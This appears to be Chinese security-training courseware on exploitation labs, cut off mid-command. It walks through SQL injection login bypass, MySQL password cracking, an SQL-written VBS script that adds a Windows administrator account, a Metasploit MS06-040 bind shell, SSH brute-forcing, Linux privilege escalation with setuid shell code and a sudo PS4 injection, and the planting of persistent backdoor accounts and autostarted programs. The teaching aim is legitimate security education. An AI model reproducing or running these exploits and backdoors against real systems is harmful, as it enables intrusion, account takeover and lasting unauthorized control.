堡壘機(jī)實(shí)訓(xùn)指導(dǎo)(六)漏洞利用課件

1、實(shí)訓(xùn)一對MySQL數(shù)據(jù)庫進(jìn)行SQL注入攻擊實(shí)訓(xùn)目的：SQL注入是從正常的WWW端口訪問，而且表面看起來跟一般的Web頁面訪問沒什么區(qū)別，可能被入侵很長時間管理員都不會發(fā)覺。隨著B/S模式應(yīng)用開發(fā)的發(fā)展，使用這種模式編寫應(yīng)用程序的程序員也越來越多。但是由于這個行業(yè)的入門門檻不高，程序員的水平及經(jīng)驗(yàn)也參差不齊，相當(dāng)一部分程序員在編寫代碼的時候，沒有對用戶輸入數(shù)據(jù)的合法性進(jìn)行判斷，使應(yīng)用程序存在安全隱患。用戶可以提交一段數(shù)據(jù)庫查詢代碼，根據(jù)程序返回的結(jié)果，獲得某些用戶想得知的數(shù)據(jù)，這就是所謂的SQL Injection，即SQL注入。掌握SQL注入基本手段 了解WEB站點(diǎn)的脆弱性 修復(fù)存在SQL注入

2、可能的漏洞 漏洞利用實(shí)訓(xùn)步驟：通過分析存在SQL注入漏洞的PHP系統(tǒng)實(shí)例，掌握的常見SQL注入的基礎(chǔ)知識正確錯誤假設(shè)我們知道該系統(tǒng)管理員用戶名為admin，使用不同的帳戶密碼登錄將會進(jìn)入下圖所示頁面漏洞嘗試在對一個網(wǎng)站進(jìn)行安全檢測的時候，檢測者并不知道被檢測的網(wǎng)站使用的是什么數(shù)據(jù)庫及網(wǎng)頁程序語言，需要對其進(jìn)行一些手動探測。本實(shí)驗(yàn)中，在“用戶”框輸入一個單引號，密碼留空，點(diǎn)擊“登錄”。結(jié)果分析：從返回信息Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/

3、login.php on line 12可以得知系統(tǒng)使用了PHP+MYSQL的架構(gòu)，以及路徑信息等。 而且很有可能存在含注入漏洞的SQL語句，如SELECT * FROM data WHERE name=。在上面的登陸界面中，選擇IE瀏覽器的 查看 - 源文件，讀取html源碼 通過分析html源碼，可以知道提交的username、password字段及post提交方式，及l(fā)ogin.php的處理頁面，后臺的SQL語句確定是：SELECT * FROM TABLES WHERE username=$username 輸入用戶名為單引號，形成以下SQL語句：SELECT * FROM TABLE

4、S WHERE username=這樣，最后的那個單引號就多余了，造成了語法錯誤。綜上所述，我們現(xiàn)在可以確定注入成功的條件了，登陸時username輸入框輸入如下內(nèi)容即可，甚至不需要輸入密碼：adminor1=1admin # 注： adminor1=1構(gòu)建了SELECT * FROM user WHERE username=adminor 1=1 AND password=語句，直接通過1=1的恒等條件，讓驗(yàn)證通過；而admin#構(gòu)建了SELECT * FROM user WHERE username=admin # AND password=語句，用#形成對后半部分語句的注釋，保證驗(yàn)證通過

5、。 實(shí)訓(xùn)二MySQL數(shù)據(jù)庫漏洞利用實(shí)訓(xùn)目的：習(xí)使用口令暴力破解工具猜測Mysql帳戶弱口令。 了解利用VBS腳本自動添加Mysql帳戶信息。 學(xué)習(xí)常見的Mysql數(shù)據(jù)庫安全加固方法。漏洞利用實(shí)訓(xùn)步驟：探測mysql對mysql服務(wù)器進(jìn)行探測,telnet對方的3306端口。服務(wù)器返回成功登錄的信息，這說明服務(wù)器正運(yùn)行著mysql服務(wù) 安裝MySQL客戶端cd C:Program FilesMySQLMySQL 5.0bin 嘗試登陸 嘗試使用“root”帳號和空密碼登錄mysql服務(wù)器，在MySQL客戶端bin目錄下使用如下命令： 下載MySQL數(shù)據(jù)庫客戶端（mysql-5.0.22-win3

6、2.exe），并進(jìn)行程序安裝，在實(shí)驗(yàn)者PC上，打開CMD命令行窗口，在CMD命令窗口中，將當(dāng)前路徑切換到MySQL安裝目錄的“bin” ，使用如下命令：mysql -hxx.xx.xx.xx -uroot返回以下信息： ERROR 1045 (28000): Access denied for user rootxx.xx.xx.xx (using password: NO) 。D.口令破解 以上信息說明root帳號存在并且允許操作者通過任何主機(jī)登錄，只不過因?yàn)槊艽a錯誤而登錄失敗，即密碼不為空。既然由于管理員的疏忽或貪圖方便導(dǎo)致root帳號可以從任何一臺主機(jī)上登錄服務(wù)器，那我們可以通過遠(yuǎn)程破解

7、他的密碼拿下mysql的權(quán)限，進(jìn)而實(shí)施一系列的操作獲得系統(tǒng)權(quán)限嗎？答案是肯定的！下面我們今天要使用的工具“CrackU”隆重登場了。 E.CrackU的使用 該工具是一個基于命令行的口令破解工具，可破解mysql，telnet，SQL Server等口令。用法如下圖（其中 “F: SandBoxtmpCrackU”為該工具所在的本地路徑）。F.登陸服務(wù)器攻擊者使用剛才獲得的管理員帳號成功登錄服務(wù)器 E.獲取管理員權(quán)限在名為mysql的數(shù)據(jù)庫建一個名為a，只有一列名為cmd的表?？墒褂靡韵碌拿睿簎se mysql;create table a (cmd text);向cmd表里插入四行數(shù)據(jù)in

8、sert into a set cmd=set wshshell=createobject (wscript.shell )r;insert into a set cmd=a=wshshell.run (cmd.exe /c net user 1 1 /add,0)r;insert into a set cmd=b=wshshell.run (cmd.exe /c net user 1 /active:yes,0)r;insert into a set cmd=c=wshshell.run (cmd.exe /c net localgroup Administrators 1 /add,0)r

9、; 插入數(shù)據(jù)部分完成，測試。把它導(dǎo)成一個可執(zhí)行文件(.vbs)到系統(tǒng)的啟動組里上圖中標(biāo)黃色的字體是我們要輸入的命令行，標(biāo)藍(lán)色字體是系統(tǒng)返回的信息問題出現(xiàn)了，系統(tǒng)報錯。因?yàn)橄到y(tǒng)默認(rèn)安裝時是不支持中文字符的，把參數(shù)character_set_client改成utf8，再把剛才的命令重新輸入即可。生成的.vbs文件會在系統(tǒng)下次啟動的時候起效，生成一個名為“1”，密碼也為“1”的管理員帳號。成功登陸系統(tǒng)等對方系統(tǒng)起來后，我們就可以用“1”這個帳號通過遠(yuǎn)程桌面登錄對方系統(tǒng)了。實(shí)訓(xùn)二 Windows系統(tǒng)緩沖區(qū)溢出漏洞利用實(shí)訓(xùn)目的：微軟的Server 服務(wù)中存在一個遠(yuǎn)程執(zhí)行代碼漏洞，成功利用此漏洞的攻擊者可

10、以完全控制受影響的系統(tǒng)。通過本實(shí)驗(yàn)可以了解Windows系統(tǒng)漏洞所能帶來的危險，以及如何針對特定的Windows系統(tǒng)漏洞進(jìn)行防御。漏洞利用實(shí)訓(xùn)步驟：GUI界面下使用Metasploit:從開始菜單里點(diǎn)擊程序-Metasploit 3-Metasploit 3 GUI直接在搜索欄輸入ms06_040，返回結(jié)果ms06_040_netapi雙擊返回結(jié)果ms06_040_netapi，彈出目標(biāo)機(jī)操作系統(tǒng)選擇對話框，請選擇Automatic 點(diǎn)擊前進(jìn)，選擇payload 參數(shù)windows/shell_bind_tcp后點(diǎn)擊前進(jìn)。在RHOST參數(shù)里填上目標(biāo)機(jī)的IP地址，其它項(xiàng)按默認(rèn)配置進(jìn)行。檢測各項(xiàng)設(shè)

11、置，在此步時可以選擇保存現(xiàn)有的配置，以便下次使用。點(diǎn)擊應(yīng)用按鈕，則可以開始對被攻擊主機(jī)使用漏洞利用攻擊，如果攻擊成功，在metasploit界面的sessions欄中可以看到下圖中高亮內(nèi)容，雙擊后即可獲得被攻擊主機(jī)上的shell(DOS命令行)。進(jìn)入C:Documents and SettingsAdministratorMy Documents目錄，shell沒有報錯，已經(jīng)取得系統(tǒng)權(quán)限。實(shí)訓(xùn)思考:臨時解決方案:在防火墻處阻止TCP端口139和445。安裝微軟官方提供的安全補(bǔ)丁，該補(bǔ)丁可在以下路徑獲取: /download/f/2/f/f2f6f032-b0db-459d-9e89-fc021

12、8973e73/Windows2000-KB921883-x86-CHS.EXE (本案例中補(bǔ)丁文件為Windows2000-KB921883-x86-CHS.EXE,存放在目標(biāo)操作系統(tǒng)的磁盤C根目錄下)實(shí)訓(xùn)二 Linux漏洞利用實(shí)訓(xùn)目的： Linux 操作系統(tǒng)是一款開源的類UNIX操作系統(tǒng)，有多種發(fā)行版（Distributions），如 RedHat Linux、SUSE Linux、Debian Linux等等等等。這些發(fā)行版在系統(tǒng)安裝、包管理、桌面應(yīng)用等方面各有特色，但是其操作系統(tǒng)內(nèi)核（Kernel）均來自于一個組織（），該組織負(fù)責(zé)Linux內(nèi)核的更新、發(fā)布。在部分已發(fā)布的內(nèi)核版本中，存

13、在一些嚴(yán)重影響操作系統(tǒng)安全的漏洞，Hacker 或 Cracker通過利用這些漏洞達(dá)到入侵并控制目標(biāo)主機(jī)的目的，Cracker 甚至?xí)ㄟ^這些漏洞入侵有問題的主機(jī)及該主機(jī)所在網(wǎng)絡(luò)，以達(dá)到竊取保密信息、散播蠕蟲木馬、發(fā)起DDOS攻擊等目的。通過2種不同漏洞的利用（內(nèi)核調(diào)用漏洞及系統(tǒng)工具漏洞），對普通帳號進(jìn)行本地提權(quán)，通過實(shí)際操作增加實(shí)驗(yàn)者對網(wǎng)絡(luò)安全及主機(jī)操作系統(tǒng)安全的認(rèn)識，對希望成為合格的 SA（System Administrator & Security Administrator）的實(shí)驗(yàn)者進(jìn)行系統(tǒng)漏洞類的部分基礎(chǔ)知識介紹。漏洞利用實(shí)訓(xùn)步驟:遠(yuǎn)程SSH服務(wù)口令暴力破解運(yùn)行 xscan_gui

14、.exe 啟動X-Scan程序。選擇菜單 設(shè)置 - 掃描參數(shù)，彈出參數(shù)設(shè)置窗口，左側(cè)選中檢測范圍選項(xiàng)，在右側(cè)的“指定IP范圍”下的文本框中輸入目標(biāo)主機(jī)IP地址 點(diǎn)開左側(cè)的全局設(shè)置，進(jìn)一步設(shè)置參數(shù)，選中左側(cè)的“掃描模塊”，在右側(cè)僅選中 SSH弱口令為了加快掃描速度，適當(dāng)增加掃描線程數(shù)，點(diǎn)擊左側(cè)的“并發(fā)掃描”，在右側(cè)的ListBox中將ssh的掃描線程數(shù)修改為 30全局設(shè)置 點(diǎn)擊左側(cè)的“其他設(shè)置”，在右側(cè)中僅選中“無條件掃描”點(diǎn)開左側(cè)的插件設(shè)置，選中“端口相關(guān)設(shè)置”，在右側(cè)的“待檢測端口”下的文本框中輸入SSH服務(wù)的默認(rèn)端口號22 選中左側(cè)的“字典文件設(shè)置”，雙擊右側(cè)的“SSH密碼字典”及“SSH

15、用戶名字典”，分別設(shè)置為 ssh_pass.dic 及 ssh_user.dic，最后點(diǎn)擊“確定”關(guān)閉參數(shù)設(shè)置窗口 點(diǎn)擊綠色右三角圖標(biāo)開始掃描，掃描完成后掃描完成后會自動打開系統(tǒng)默認(rèn)瀏覽器顯示掃描結(jié)果，在 X-Scan 工具主窗口也可以看到相應(yīng)結(jié)果， 在左側(cè)窗口中 “/” 前面是用戶名，后面是密碼；在“安全漏洞及解決方案”列中，“/” 前面是用戶名，后面是密碼Linux本地提權(quán)1：利用內(nèi)核調(diào)用漏洞（prctl()調(diào)用）用第一步獲取的賬戶 tester（對此帳戶進(jìn)行提權(quán)） 登錄遠(yuǎn)程主機(jī) 創(chuàng)建編寫提權(quán)代碼文件 命令格式： testerLT-courseware-0007$cat ex.c ex2.

16、c _EOF 代碼內(nèi)容如：#include int main (void) setuid(0);setgid(0); seteuid(0);setegid(0);system(“/bin/sh”);return(0); b). 編譯提權(quán)文件ex2 命令格式： sh-3.00# gcc -o ex2 ex2.c staticc). 執(zhí)行提權(quán)文件ex2 命令格式： sh-3.00# ./ex2d). 查看當(dāng)前用戶狀態(tài)，可以看到當(dāng)前的 uid 已經(jīng)是 0 了，即獲得了 root shell 命令格式：sh-3.00# id 【說明】至此，利用內(nèi)核調(diào)用漏洞進(jìn)行Linux本地用戶提權(quán)成功，已經(jīng)在test

17、er帳戶環(huán)境下獲取了root shell（即獲得了擁有root權(quán)限的shell）。 LINUX本地提權(quán)2：利用系統(tǒng)工具漏洞（SUDO）用第一步獲取的賬戶 test（對此帳戶進(jìn)行提權(quán)）登錄遠(yuǎn)程主機(jī)切換到c shell命令格式：testLT-courseware-0007$csh 創(chuàng)建輔助腳本及提權(quán)源代碼 命令格式：testLT-courseware-0007$cat ex.sh ex.c _EOF 帳戶提權(quán)代碼內(nèi)容如下：#include int main (void) setuid(0);system(“/bin/sh”);return(0); 準(zhǔn)備輔助腳本，編譯提權(quán)代碼a).為輔助腳本ex.s

18、h文件添加執(zhí)行權(quán)限 命令格式： testLT-courseware-0007$chmod u+x ex.sh b). 編譯提權(quán)源代碼文件 命令格式： testLT-courseware-0007$gcc -o ex ex.c c). 查看文件屬性，ex.sh 腳本具有了執(zhí)行權(quán)限，ex 可執(zhí)行程序的屬主為 test， 組也為test 命令格式：testLT-courseware-0007$ls -al ex.shtestLT-courseware-0007$ls -al ex 設(shè)置環(huán)境變量，利用sudo 的漏洞改變 ex 可執(zhí)行程序的屬主和組，同時為其設(shè)置suid，我們可以看到， ex 可執(zhí)行程

19、序的屬主改變?yōu)?root，組也改變?yōu)閞oot，同時設(shè)置了s位 命令格式： testLT-courseware-0007$setenv SHELLOPTS xtracetestLT-courseware-0007$setenv PS4 $(chown root:root ex;chmod u+s ex)testLT-courseware-0007$sudo ./ex.sh 查看提權(quán)文件ex的文件屬性，ex 可執(zhí)行程序的屬主改變?yōu)?root，組也改變?yōu)閞oot，同時設(shè)置了s位命令格式： testLT-courseware-0007$ls -al ex 注： 若執(zhí)行 “sudo ./ex.sh” 后

20、提示輸入密碼，則輸入 test 賬戶的密碼。執(zhí)行 ./ex 進(jìn)行提權(quán)，我們可以看到，當(dāng)前的 uid 已經(jīng)是 0 了，即獲得了 root shell 命令格式：testLT-courseware-0007$./ex 簡易后門制作1: 添加/修改帳戶，將后門程序作為默認(rèn)shell在剛才獲取的 root shell 權(quán)限的帳戶test中，切換當(dāng)前目錄為/bin命令格式：sh-3.00# cd /bin 創(chuàng)建后門程序 命令格式：sh-3.00# cat bd.c _EOF 后門程序代碼如：#include int main (void) setuid(0);setgid(0);seteuid(0);s

21、etegid(0);system(“/bin/sh”);return(0); 編譯后門程序bd.c文件,并將原bd.c文件刪除 命令格式： sh-3.00# gcc -o bd bd.c -staticsh-3.00# rm -f bd.c 添加賬戶或修改當(dāng)前賬戶，并將該賬戶的 shell 設(shè)置為后門程序以直接獲取 root shell 命令格式： sh-3.00# /usr/sbin/useradd -d /tmp -s /bin/bd testbdsh-3.00# psaaword testbd 圖中紅色框內(nèi)的內(nèi)容為創(chuàng)建后門程序，黃色框內(nèi)的內(nèi)容為添加一個賬戶，并設(shè)置該賬戶的home目錄為/

22、tmp，登錄shell為剛才創(chuàng)建的后門程序，帳戶添加成功后用 passwd 命令設(shè)置為其密碼。使用新創(chuàng)建的帳戶testbd進(jìn)行登錄測試，啟動一個新的 Putty 窗口， 輸入添加帳戶testbd時設(shè)置的密碼， 登錄后輸入 id 查看用戶權(quán)限：root shell 至此，已經(jīng)完成帳戶添加/修改簡易后門程序制作，使得新添加，修改的帳戶直接擁有默認(rèn)的root shell權(quán)限。不需要再通過本地提權(quán)方式進(jìn)行提權(quán)后在獲得root shell 權(quán)限。簡易后門制作2：將后門程序設(shè)置為自啟動，通過網(wǎng)絡(luò)登錄保持剛才獲取的 root shell 窗口打開；后面需要使用此窗口。在本機(jī)啟動putty sftp 服務(wù)器端

23、軟件工具，上傳后門文件（ndoor.bz2） 命令格式：psftp open 目標(biāo)主機(jī) IP【需要輸入用戶名以及密碼】psftp lcd 切換本地目錄到 ndoor.bz2 文件所在路徑psftp put ndoor.bz2查看上傳ndoor.bz2文件是否已經(jīng)存在，并退出psftp 命令格式：psftp ls *.bz2psftp exit 另起一個 Putty 程序，用普通帳戶test登錄。在test用戶目錄中查看ndoor.bz2文件，并解壓縮剛才上傳的后門程序 命令格式： testLT-courseware-0007 -$ls -al ndoor.bz2testLT-coursewar

24、e-0007 -$bunzip2 ndoor.bz2 切換到 root shell，【使用test帳戶登錄提權(quán)后的putty窗口】修改后門程序的屬主、組及權(quán)限， 并將其移動到系統(tǒng)目錄中，切換到ndoor文件的解壓目錄 命令格式：sh-3.00# cd /home/testsh-3.00# ls -al ndoor （修改程序?qū)傩圆⒉榭葱薷慕Y(jié)果）ssh-3.00# chown root:root ndoorsh-3.00# chmod 755 ndoorsh-3.00# ls -al ndoor （移動ndoor文件到/bin目錄下）sh-3.00# mv ndoor /bin 創(chuàng)建啟動腳本，并在 run level 3 及 run level 5 中添加自啟動 命令格式：sh-3.00# cat /etc